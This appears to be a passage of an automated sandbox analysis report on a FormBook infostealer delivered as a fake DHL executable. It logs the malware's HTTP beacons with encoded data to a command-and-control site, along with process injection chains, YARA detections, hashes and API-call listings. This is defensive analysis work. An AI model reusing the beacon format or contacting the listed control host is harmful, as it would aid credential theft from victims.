Dec 24, 2024 08:26:52.374905109 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 24 Dec 2024 07:26:52 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50001	217.196.55.202	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:53.837863922 CET	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 [TRUNCATED] Data Ascii: UzG=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4cQ [TRUNCATED]
Dec 24, 2024 08:26:55.035578012 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 24 Dec 2024 07:26:54 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50002	217.196.55.202	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:56.487705946 CET	517	OUT	GET /fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:26:57.687829018 CET	1234	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 24 Dec 2024 07:26:57 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	02:23:02
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\DHL 806-232024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 806-232024.exe"
Imagebase:	0x8d0000
File size:	1'208'832 bytes
MD5 hash:	A32E770C62BAB92FB9F5413A70A62836
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:23:03
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 806-232024.exe"
Imagebase:	0x380000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:23:10
Start date:	24/12/2024
Path:	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe"
Imagebase:	0x4d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:23:12
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xab0000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:23:25
Start date:	24/12/2024
Path:	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe"
Imagebase:	0x4d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:23:37
Start date:	24/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	154

Executed Functions

Function 008D3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
IsDebuggerPresent.KERNEL32 ref: 008D3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

Part of subcall function 008E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008D3C26,009962F8,?,?,?), ref: 008E0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009893F0,00000010), ref: 0090D4BC
SetCurrentDirectoryW.KERNEL32(?,009962F8,?,?,?), ref: 0090D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00985D40,009962F8,?,?,?), ref: 0090D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0090D581

Part of subcall function 008D3A58: GetSysColorBrush.USER32(0000000F), ref: 008D3A62
Part of subcall function 008D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
Part of subcall function 008D3A58: LoadIconW.USER32(00000063), ref: 008D3A88
Part of subcall function 008D3A58: LoadIconW.USER32(000000A4), ref: 008D3A9A
Part of subcall function 008D3A58: LoadIconW.USER32(000000A2), ref: 008D3AAC
Part of subcall function 008D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
Part of subcall function 008D3A58: RegisterClassExW.USER32(?), ref: 008D3B28

Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A53

Part of subcall function 008D43DB: _memset.LIBCMT ref: 008D4401
Part of subcall function 008D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0090D4B4
runas, xrefs: 0090D575

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 25601ac719f343298a44ada9e3cccefd5cf2e3154f65e30dc073efe5a780e7ef
Instruction ID: 65c4441ae71927ce4f8751f39dc76e87115b3ee847cb3d26bfe90c2a2ead4fd2
Opcode Fuzzy Hash: 25601ac719f343298a44ada9e3cccefd5cf2e3154f65e30dc073efe5a780e7ef
Instruction Fuzzy Hash: 1A510130A28248AECF11ABFCDC15EFD7B78FB44354B004267F461E23A1DA744A05EB22

Function 008D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 008D4B2B

Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66

GetCurrentProcess.KERNEL32(?,0095FAEC,00000000,00000000,?), ref: 008D4BF8
IsWow64Process.KERNEL32(00000000), ref: 008D4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 008D4C45
FreeLibrary.KERNEL32(00000000), ref: 008D4C50
GetSystemInfo.KERNEL32(00000000), ref: 008D4C81
GetSystemInfo.KERNEL32(00000000), ref: 008D4C8D

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
Instruction ID: 30e5809ee47b0a6bd790d3b694e101fefcb6d028a93846d456da0d63513c05f3
Opcode Fuzzy Hash: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
Instruction Fuzzy Hash: 9D91C23154ABC4DFC731DBA885611AABFE4FF36310B485A5FD0CA83B41D631A908D71A

Function 008D4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D5010
LoadResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD60
SizeofResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD75
LockResource.KERNEL32(008D4EEE,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F,00000000), ref: 0090DD88

Strings

SCRIPT, xrefs: 008D5006

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
Instruction ID: 34b49a38639d172716ae6060dd402b0f971d653e09ad65016ef3b6ee877ad76b
Opcode Fuzzy Hash: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
Instruction Fuzzy Hash: E7115175240B01BFD7218B66DC58F677BB9FBC5722F108269F415C6290DB61DC009661

Function 00934696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0090E7C1), ref: 009346A6
FindFirstFileW.KERNELBASE(?,?), ref: 009346B7
FindClose.KERNEL32(00000000), ref: 009346C7

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
Instruction ID: f2b12f135d3a1f32f3a0395324f2d9441e840319271ca6560882ffc1ca8abd4d
Opcode Fuzzy Hash: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
Instruction Fuzzy Hash: 4DE020364245005B52106B38EC5E4EA775CDE0737AF100715F935C20F0E7B06D509BD6

Function 008E0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0BBB
timeGetTime.WINMM ref: 008E0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0FB3
TranslateMessage.USER32(?), ref: 008E0FC7
DispatchMessageW.USER32(?), ref: 008E0FD5
Sleep.KERNEL32(0000000A), ref: 008E0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 008E105A
DestroyWindow.USER32 ref: 008E1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008E1080
Sleep.KERNEL32(0000000A,?,?), ref: 009152AD
TranslateMessage.USER32(?), ref: 0091608A
